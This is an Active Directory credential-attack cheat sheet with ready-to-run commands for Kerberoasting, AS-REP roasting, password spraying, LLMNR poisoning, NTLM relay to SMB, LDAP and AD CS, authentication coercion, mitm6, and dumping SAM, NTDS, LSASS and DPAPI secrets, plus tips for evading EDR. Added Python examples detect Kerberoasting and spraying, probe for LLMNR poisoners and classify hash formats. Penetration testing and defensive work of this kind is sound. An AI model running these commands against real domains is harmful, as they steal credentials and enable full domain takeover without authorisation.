Credential Attack

You've enumerated the domain. Now it's time to harvest, crack, relay, and dump credentials to expand your access.


Kerberoasting

Extract TGS hashes for service accounts with SPNs. [Kerberos]

terminal.log
root@localhost:~# impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request -outputfile kerberoast_hashes.txt

With hash (PTH). [Kerberos]

terminal.log
root@localhost:~# impacket-GetUserSPNs <DOMAIN>/<USER> -hashes :<HASH> -dc-ip <DC_IP> -request -outputfile kerberoast_hashes.txt

Via NetExec. [Kerberos]

terminal.log
root@localhost:~# nxc ldap <DC_IP> -u <USER> -p <PASS> --kerberoasting kerberoast_hashes.txt

Targeted Kerberoasting

Set an SPN on a target you have GenericAll/GenericWrite on, roast it, then clean up. [Kerberos] [Requires GenericAll/GenericWrite on target]

terminal.log
root@localhost:~# python3 targetedKerberoast.py -u <USER> -p <PASS> -d <DOMAIN_FQDN> --dc-ip <DC_IP>

Manual approach with bloodyAD.

terminal.log
# Set SPN on target
root@localhost:~# bloodyAD -u <USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> set object <TARGET_USER> servicePrincipalName -v 'MSSQLSvc/fake.domain.local:1433'

# Roast it
root@localhost:~# impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request-user <TARGET_USER> -outputfile targeted_hash.txt

# Clean up (remove the SPN)
root@localhost:~# bloodyAD -u <USER> -p <PASS> -d <DOMAIN_FQDN> --host <DC_IP> set object <TARGET_USER> servicePrincipalName

Cracking TGS Hashes

RC4 encrypted (mode 13100).

terminal.log
root@localhost:~# hashcat -m 13100 kerberoast_hashes.txt wordlist.txt

AES256 encrypted (mode 19700).

terminal.log
root@localhost:~# hashcat -m 19700 kerberoast_hashes.txt wordlist.txt
Tip
RC4 hashes are far more common and faster to crack. AES256 means the account was configured with AES encryption (harder to crack, but still worth trying with a good wordlist).
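The defender's counterpart to the roast-and-crack workflow above, as an added example (this is not one of the tools listed on this page): a check over Security event 4769 (Kerberos service ticket requested) records. One principal requesting tickets for several distinct, non-machine service accounts within a short burst is the shape of a Kerberoast, and RC4 (TicketEncryptionType 0x17) tickets in an environment that otherwise issues AES are the tell. The records below are constructed; the keys map to the 4769 fields TargetUserName (requester), IpAddress, ServiceName and TicketEncryptionType, and the window and service-count thresholds are assumptions to tune per environment.

```python
"""Detect Kerberoasting from Security event 4769 (Kerberos service ticket
requested). Added example for this page, not one of the tools it lists.
The records are constructed; their keys map to the 4769 fields
TargetUserName (requester), IpAddress, ServiceName and TicketEncryptionType."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC; 0x12 is AES256

# Constructed sample: one user pulls tickets for several service accounts
# in a burst (mostly RC4), a machine account ticket that must be ignored,
# and ordinary single-ticket traffic that must not alert.
SAMPLE_4769 = [
    {"time": "2024-05-01T09:00:01", "requester": "jdoe", "ip": "10.0.0.25", "service": "svc_sql", "etype": "0x17"},
    {"time": "2024-05-01T09:00:02", "requester": "jdoe", "ip": "10.0.0.25", "service": "svc_web", "etype": "0x17"},
    {"time": "2024-05-01T09:00:02", "requester": "jdoe", "ip": "10.0.0.25", "service": "svc_backup", "etype": "0x17"},
    {"time": "2024-05-01T09:00:03", "requester": "jdoe", "ip": "10.0.0.25", "service": "svc_aes", "etype": "0x12"},
    {"time": "2024-05-01T09:00:03", "requester": "jdoe", "ip": "10.0.0.25", "service": "FS01$", "etype": "0x12"},
    {"time": "2024-05-01T09:05:00", "requester": "asmith", "ip": "10.0.0.40", "service": "svc_sql", "etype": "0x12"},
    {"time": "2024-05-01T10:00:00", "requester": "asmith", "ip": "10.0.0.40", "service": "svc_web", "etype": "0x12"},
]


def is_roastable_service(name):
    """Machine accounts (trailing $) and krbtgt are not Kerberoast targets;
    only user accounts with SPNs have crackable passwords behind the TGS."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def detect_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Return one alert per (requester, ip) that requested tickets for at least
    `min_services` distinct roastable service accounts inside `window`.
    The RC4-encrypted services are listed separately: those accounts should
    have AES enabled (msDS-SupportedEncryptionTypes) or a long random password."""
    grouped = defaultdict(list)
    for e in events:
        if is_roastable_service(e["service"]):
            grouped[(e["requester"], e["ip"])].append(
                (datetime.fromisoformat(e["time"]), e["service"], e["etype"]))
    alerts = []
    for (requester, ip), recs in grouped.items():
        recs.sort()
        for i, (start, _, _) in enumerate(recs):
            # sliding window anchored at each request
            burst = [r for r in recs[i:] if r[0] - start <= window]
            services = sorted({svc for _, svc, _ in burst})
            if len(services) >= min_services:
                rc4 = sorted({svc for _, svc, et in burst if et == RC4_HMAC})
                alerts.append({"requester": requester, "ip": ip,
                               "start": start.isoformat(),
                               "services": services, "rc4_services": rc4})
                break  # one alert per requester is enough
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoasting(SAMPLE_4769):
        print(f"{a['requester']}@{a['ip']} at {a['start']}: "
              f"{len(a['services'])} service tickets, RC4 for {a['rc4_services']}")
```

Run against real 4769 exports, the thresholds need tuning: monitoring and backup software legitimately touch many SPNs, so an allow-list per requester is the usual next step. The `rc4_services` list doubles as a remediation queue, since an account that still hands out RC4 tickets is the one whose hash lands in mode 13100.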

AS-REP Roasting

Unauthenticated (with a user list)

terminal.log
root@localhost:~# impacket-GetNPUsers <DOMAIN>/ -dc-ip <DC_IP> -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt

Authenticated (auto-enumerate vulnerable accounts)

terminal.log
root@localhost:~# impacket-GetNPUsers <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request -format hashcat -outputfile asrep_hashes.txt

Crack AS-REP Hashes

terminal.log
root@localhost:~# hashcat -m 18200 asrep_hashes.txt wordlist.txt

Password Spraying

Spray a single password across all users. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u users.txt -p '<PASSWORD>' --continue-on-success

Kerberos-based spray (stealthier, fewer logon events). [Kerberos]

terminal.log
root@localhost:~# kerbrute passwordspray -d <DOMAIN_FQDN> --dc <DC_IP> users.txt '<PASSWORD>'

Multiple passwords against multiple users. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
Tip
--no-bruteforce pairs each user with the corresponding password line-by-line instead of trying every combination. Useful for credential stuffing.

Spray via LDAP (sometimes works when SMB is locked down). [LDAP]

terminal.log
root@localhost:~# nxc ldap <DC_IP> -u users.txt -p '<PASSWORD>' --continue-on-success
Tip
Always check the password policy first (nxc smb <DC_IP> -u '' -p '' --pass-pol). Stay under the lockout threshold. Wait for the observation window between sprays.
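The detection that corresponds to the password-policy advice above, as an added example (not one of the tools listed on this page): a spray is one source failing against many distinct accounts with few attempts each, which is exactly the pattern that stays under a lockout threshold and is therefore invisible to lockout-based alerting. Both NTLM/SMB failures (event 4625) and Kerberos pre-authentication failures (event 4771) are folded in, because a Kerberos-based spray produces no 4625 at all. The records, window and thresholds are constructed and assumed.

```python
"""Flag password spraying from authentication-failure events: one source
failing against many distinct accounts with few attempts each. Added example
for this page, not one of the tools it lists; the records are constructed.
Both NTLM/SMB failures (event 4625) and Kerberos pre-authentication failures
(event 4771) are considered, because a Kerberos spray produces no 4625."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: "src" is the client address from the event
# (IpAddress), "user" the account name (TargetUserName).
SAMPLE_FAILURES = [
    # Spray: one source, eight accounts, one attempt each, within a minute.
    {"time": f"2024-05-01T08:00:{i:02d}", "event_id": 4771, "user": u, "src": "10.0.0.77"}
    for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank", "grace", "heidi"])
] + [
    # One user mistyping their own password three times from a workstation:
    # a single account, so it must not be reported as a spray.
    {"time": "2024-05-01T08:10:00", "event_id": 4625, "user": "alice", "src": "10.0.1.15"},
    {"time": "2024-05-01T08:10:05", "event_id": 4625, "user": "alice", "src": "10.0.1.15"},
    {"time": "2024-05-01T08:10:12", "event_id": 4625, "user": "alice", "src": "10.0.1.15"},
]


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return one alert per source address that failed against at least
    `min_users` distinct accounts inside `window`. The per-user attempt count
    is reported so a spray (low) can be told apart from a brute force (high)."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(
            (datetime.fromisoformat(e["time"]), e["user"], e["event_id"]))
    alerts = []
    for src, recs in by_src.items():
        recs.sort()
        for i, (start, _, _) in enumerate(recs):
            # sliding window anchored at each failure
            burst = [r for r in recs[i:] if r[0] - start <= window]
            per_user = defaultdict(int)
            for _, user, _ in burst:
                per_user[user] += 1
            if len(per_user) >= min_users:
                alerts.append({
                    "src": src,
                    "start": start.isoformat(),
                    "users": sorted(per_user),
                    "max_attempts_per_user": max(per_user.values()),
                    "event_ids": sorted({eid for _, _, eid in burst}),
                })
                break  # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for a in detect_spray(SAMPLE_FAILURES):
        print(f"spray from {a['src']} starting {a['start']}: {len(a['users'])} accounts, "
              f"max {a['max_attempts_per_user']} attempt(s) each, events {a['event_ids']}")
```

The window should be at least as long as the domain's lockout observation window, since a patient spray paces itself to that value; a source that shows up in several consecutive windows with a fresh set of accounts each time is the same story told slowly.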

LLMNR / NBT-NS / mDNS Poisoning

Capture NTLMv2 hashes on the local network.

terminal.log
root@localhost:~# responder -I eth0 -dwPv

Analyze mode first (see traffic without poisoning).

terminal.log
root@localhost:~# responder -I eth0 -A
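Analyze mode shows what a poisoner would see; the defender's mirror image is a canary probe, given here as an added example that is not part of Responder or of this page's tooling. It sends one LLMNR query for a hostname that cannot exist and reports every host that answers, because a legitimate resolver never claims a name it does not own. The message layout is the DNS-shaped LLMNR format (RFC 4795); the multicast group and port are the standard ones, and the canary name is generated at random.

```python
"""LLMNR canary probe: ask the local segment for a name that cannot exist
and treat any answer as a sign that something is answering names it does
not own. Added example for this page, not part of Responder; the packet
layout is the DNS-shaped LLMNR message (RFC 4795)."""
import random
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """DNS label encoding: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in name.split(".")) + b"\x00"


def build_llmnr_query(name, txid):
    # Header: ID, flags (0 = standard query), QDCOUNT=1, AN/NS/AR counts 0
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def skip_name(data, pos):
    """Advance past an encoded name (or a 2-byte compression pointer)."""
    while True:
        length = data[pos]
        if length == 0:
            return pos + 1
        if length & 0xC0 == 0xC0:
            return pos + 2
        pos += 1 + length


def parse_llmnr_response(data, txid):
    """Return the IPv4 addresses carried in A records of a response to our
    query, or None if the datagram is not a response with our transaction ID."""
    if len(data) < 12:
        return None
    rid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000:   # 0x8000 = QR bit (this is a response)
        return None
    pos = 12
    for _ in range(qdcount):
        pos = skip_name(data, pos) + 4      # skip QTYPE + QCLASS
    addrs = []
    for _ in range(ancount):
        pos = skip_name(data, pos)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        if rtype == QTYPE_A and rclass == QCLASS_IN and rdlen == 4:
            addrs.append(socket.inet_ntoa(data[pos:pos + 4]))
        pos += rdlen
    return addrs


def probe(name=None, timeout=2.0):
    """Send one canary query and collect every (responder address, answers).
    An empty list is the healthy result; anything else points at a host that
    is answering for names it cannot legitimately resolve."""
    name = name or f"canary-{random.randrange(1 << 32):08x}"
    txid = random.randrange(1 << 16)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    hits = []
    try:
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _) = sock.recvfrom(1024)
            addrs = parse_llmnr_response(data, txid)
            if addrs:
                hits.append((src, addrs))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    for src, addrs in probe():
        print(f"LLMNR answer for a non-existent name from {src}: {addrs}")
```

Run it periodically from a host on each segment; it needs no privileges beyond sending UDP. A hit identifies the answering host, which is the thing to go and look at. The probe is a detection, not a fix: the mitigation is still disabling LLMNR and NBT-NS by policy where nothing depends on them, which removes the traffic Responder feeds on.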

Crack NTLMv2 Hashes

terminal.log
root@localhost:~# hashcat -m 5600 ntlmv2_hashes.txt wordlist.txt

NTLM Relay

Relay to SMB

Relay captured auth to hosts with SMB signing disabled.

terminal.log
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support

Relay and execute a command.

terminal.log
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support -c 'whoami'

Relay and dump SAM.

terminal.log
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support --dump-sam

Relay to LDAP

Relay to LDAP to create a machine account and set RBCD. [LDAP]

terminal.log
root@localhost:~# impacket-ntlmrelayx -t ldap://<DC_IP> --delegate-access -smb2support

Relay to LDAP to set Shadow Credentials. [LDAP]

terminal.log
root@localhost:~# impacket-ntlmrelayx -t ldap://<DC_IP> --shadow-credentials --shadow-target <TARGET>$ -smb2support

Relay to AD CS (ESC8)

Relay to the CA’s HTTP enrollment endpoint. [AD CS]

terminal.log
root@localhost:~# impacket-ntlmrelayx -t http://<CA_IP>/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Tip
ESC8 is one of the most impactful relay attacks. Coerce a DC, relay to the CA, get a DC certificate, then authenticate as the DC. Game over.

Relay to MSSQL

terminal.log
root@localhost:~# impacket-ntlmrelayx -t mssql://<TARGET> -smb2support -q 'SELECT system_user'

Authentication Coercion

Force a target machine to authenticate to your listener.

Coercer (tries all methods automatically)

terminal.log
root@localhost:~# coercer coerce -u <USER> -p <PASS> -d <DOMAIN_FQDN> -l <LISTENER_IP> -t <TARGET>

Scan for available coercion methods without triggering them.

terminal.log
root@localhost:~# coercer scan -u <USER> -p <PASS> -d <DOMAIN_FQDN> -t <TARGET>

PetitPotam (MS-EFSRPC)

Unauthenticated (on unpatched DCs).

terminal.log
root@localhost:~# python3 PetitPotam.py <LISTENER_IP> <DC_IP>

Authenticated.

terminal.log
root@localhost:~# python3 PetitPotam.py -u <USER> -p <PASS> -d <DOMAIN> <LISTENER_IP> <TARGET>

PrinterBug / SpoolService (MS-RPRN)

terminal.log
root@localhost:~# python3 dementor.py -u <USER> -p <PASS> -d <DOMAIN> <LISTENER_IP> <TARGET>

DFSCoerce (MS-DFSNM)

terminal.log
root@localhost:~# python3 DFSCoerce.py -u <USER> -p <PASS> -d <DOMAIN> <LISTENER_IP> <TARGET>
Tip
Chain coercion with relay. The typical combo: coerce a DC → relay to LDAP (set RBCD or Shadow Creds) or relay to AD CS (ESC8). Always have your relay listener running before triggering coercion.

IPv6 DNS Poisoning + Relay

Poison IPv6 DNS via WPAD and relay to LDAP. [IPv6] [LDAP]

terminal.log
# Terminal 1 (poison)
root@localhost:~# mitm6 -d <DOMAIN_FQDN>

# Terminal 2 (relay to LDAP for RBCD)
root@localhost:~# impacket-ntlmrelayx -6 -t ldaps://<DC_IP> --delegate-access -wh wpad.<DOMAIN_FQDN>

Relay to AD CS instead. [IPv6] [AD CS]

terminal.log
# Terminal 1
root@localhost:~# mitm6 -d <DOMAIN_FQDN>

# Terminal 2
root@localhost:~# impacket-ntlmrelayx -6 -t http://<CA_IP>/certsrv/certfnsh.asp --adcs --template Machine -wh wpad.<DOMAIN_FQDN>
Tip
mitm6 is passive and waits for DHCPv6 requests. It can take a few minutes to catch traffic. Be patient.

Credential Dumping

SAM Hive (local accounts)

[SMB] [Requires Local Admin]

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -p <PASS> --sam

With hash.

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -H <HASH> --sam

LSA Secrets (service account creds, cached domain creds)

[SMB] [Requires Local Admin]

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -p <PASS> --lsa

NTDS.dit (all domain hashes)

[SMB] [Requires DA]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u <USER> -p <PASS> --ntds

NTDS with history (previous passwords).

terminal.log
root@localhost:~# nxc smb <DC_IP> -u <USER> -p <PASS> --ntds --history

Impacket secretsdump (full dump)

Dumps SAM + LSA + NTDS + cached creds in one shot.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP>

With hash.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>@<DC_IP> -hashes :<HASH>

NTDS only (faster).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc

NTLM hashes only (fastest).

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-ntlm

Target a specific user.

terminal.log
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<DC_IP> -just-dc-user Administrator

Via Kerberos.

terminal.log
root@localhost:~# export KRB5CCNAME=<USER>.ccache
root@localhost:~# impacket-secretsdump <DOMAIN>/<USER>@<DC_FQDN> -k -no-pass

LSASS Dumping

Dump LSASS remotely with lsassy. [Requires Local Admin]

terminal.log
root@localhost:~# lsassy -u <USER> -p <PASS> -d <DOMAIN> <TARGET>

Via NetExec module.

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -p <PASS> -M lsassy

With hash.

terminal.log
root@localhost:~# lsassy -u <USER> -H <HASH> -d <DOMAIN> <TARGET>
Tip
If AV/EDR is blocking standard methods, try alternative dump techniques: nanodump, HandleKatz, or MiniDumpWriteDump via custom tooling.

DPAPI Secrets

Extract DPAPI-protected secrets (saved passwords, browser creds, etc.). [Requires Local Admin]

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -p <PASS> -M dpapi

Dump DPAPI backup keys from the DC. [Requires DA]

terminal.log
root@localhost:~# impacket-dpapi backupkeys -t <DOMAIN>/<USER>:<PASS>@<DC_IP> --export
Tip
DPAPI backup keys from the DC let you decrypt any user’s DPAPI-protected secrets domain-wide.

Certificate Theft

Extract user/machine certificates from a target using Masky. [SMB] [Requires Local Admin]

terminal.log
root@localhost:~# nxc smb <TARGET> -u <USER> -p <PASS> -M masky
Tip
Stolen certificates can be used for authentication even after a password reset. They remain valid until the cert expires or is revoked.

Hash Formats (Quick Reference)

Attack               Hashcat Mode   Example Prefix
NTLM (PTH)           1000           aad3b435b51404eeaad3b435b51404ee:...
NTLMv2 (Responder)   5600           USER::DOMAIN:challenge:...
AS-REP Roast         18200          $krb5asrep$23$...
Kerberoast RC4       13100          $krb5tgs$23$...
Kerberoast AES256    19700          $krb5tgs$18$...
NetNTLMv1            5500           USER::DOMAIN:LM:NT:challenge
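An added helper that goes with this table and with the cracking commands earlier on the page (Cracking TGS Hashes, Crack AS-REP Hashes, Crack NTLMv2 Hashes); it is not a tool from the page. It classifies each line of a capture file by the field layouts the listed tools write, maps it to the hashcat mode from the table, and summarises which Kerberoast accounts still came back RC4-encrypted, which is the list a defender uses to enable AES on service accounts. The sample lines are constructed stand-ins with the documented layout and correct field widths, not real captures; the secretsdump `user:rid:lm:nt:::` line form is also accepted.

```python
"""Classify credential hash lines by format and map each to the hashcat mode
from the quick-reference table on this page. Added example, not part of the
original page; the sample lines are constructed (and shortened) stand-ins
for real captures that follow the documented field layouts."""
import re
from collections import Counter

# Constructed sample capture: one line per format in the table.
SAMPLE_LINES = [
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$0123456789abcdef0123456789abcdef$a1b2c3d4e5f6a7b8c9d0e1f2",
    "$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$00112233445566778899aabb$ccddeeff00112233445566778899aabbccddeeff",
    "$krb5asrep$23$jdoe@CORP.LOCAL:ffeeddccbbaa99887766554433221100$0f1e2d3c4b5a69788796a5b4c3d2e1f0",
    "asmith::CORP:1122334455667788:9f86d081884c7d659a2feaa0c55ad015:0101000000000000c0653150de09d201",
    "bjones::CORP:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:727b4e35f947129ea52b9cefafd98fe1b82e2e5c0b4cf7b5:1122334455667788",
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
]

# (format name, hashcat mode, line pattern). Field widths follow what the
# tools write: RC4 checksums are 16 bytes, AES checksums 12 bytes.
FORMATS = [
    ("ntlm", 1000, re.compile(
        r"^(?:(?P<user>[^:]+):(?P<rid>\d+):)?(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32})(?::::)?$", re.I)),
    ("netntlmv2", 5600, re.compile(
        r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<challenge>[0-9a-f]{16}):(?P<proof>[0-9a-f]{32}):(?P<blob>[0-9a-f]+)$", re.I)),
    ("krb5asrep_rc4", 18200, re.compile(
        r"^\$krb5asrep\$23\$(?P<user>[^@]+)@(?P<realm>[^:]+):(?P<checksum>[0-9a-f]{32})\$(?P<data>[0-9a-f]+)$", re.I)),
    ("krb5tgs_rc4", 13100, re.compile(
        r"^\$krb5tgs\$23\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*\$(?P<checksum>[0-9a-f]{32})\$(?P<data>[0-9a-f]+)$", re.I)),
    ("krb5tgs_aes256", 19700, re.compile(
        r"^\$krb5tgs\$18\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$\*(?P<spn>[^*]+)\*\$(?P<checksum>[0-9a-f]{24})\$(?P<data>[0-9a-f]+)$", re.I)),
    ("netntlmv1", 5500, re.compile(
        r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<lm>[0-9a-f]{48}):(?P<nt>[0-9a-f]{48}):(?P<challenge>[0-9a-f]{16})$", re.I)),
]

# Long ciphertext fields are dropped from the summary; they carry no metadata.
PAYLOAD_FIELDS = {"data", "blob", "proof", "lm", "nt"}


def classify(line):
    """Return {"format", "mode", ...named fields} for a recognised line, else None."""
    line = line.strip()
    for name, mode, pattern in FORMATS:
        m = pattern.match(line)
        if m:
            info = {"format": name, "mode": mode}
            info.update({k: v for k, v in m.groupdict().items() if k not in PAYLOAD_FIELDS})
            return info
    return None


def summarize(lines):
    """Count recognised lines per hashcat mode and list the Kerberoast
    accounts whose tickets came back RC4: those are the accounts to move to
    AES (or give a long random password), since RC4 is the cheap mode to crack."""
    modes = Counter()
    rc4_accounts = []
    for line in lines:
        info = classify(line)
        if info is None:
            continue
        modes[info["mode"]] += 1
        if info["format"] == "krb5tgs_rc4":
            rc4_accounts.append(f"{info['user']}@{info['realm']}")
    return modes, sorted(rc4_accounts)


if __name__ == "__main__":
    modes, rc4 = summarize(SAMPLE_LINES)
    for mode, count in sorted(modes.items()):
        print(f"hashcat -m {mode}: {count} line(s)")
    print("RC4 Kerberoast accounts:", rc4)
```

Feed it the output files the commands above produce (kerberoast_hashes.txt, asrep_hashes.txt, a Responder log) and it tells you which `-m` each batch needs without eyeballing prefixes; the RC4 list is the remediation queue.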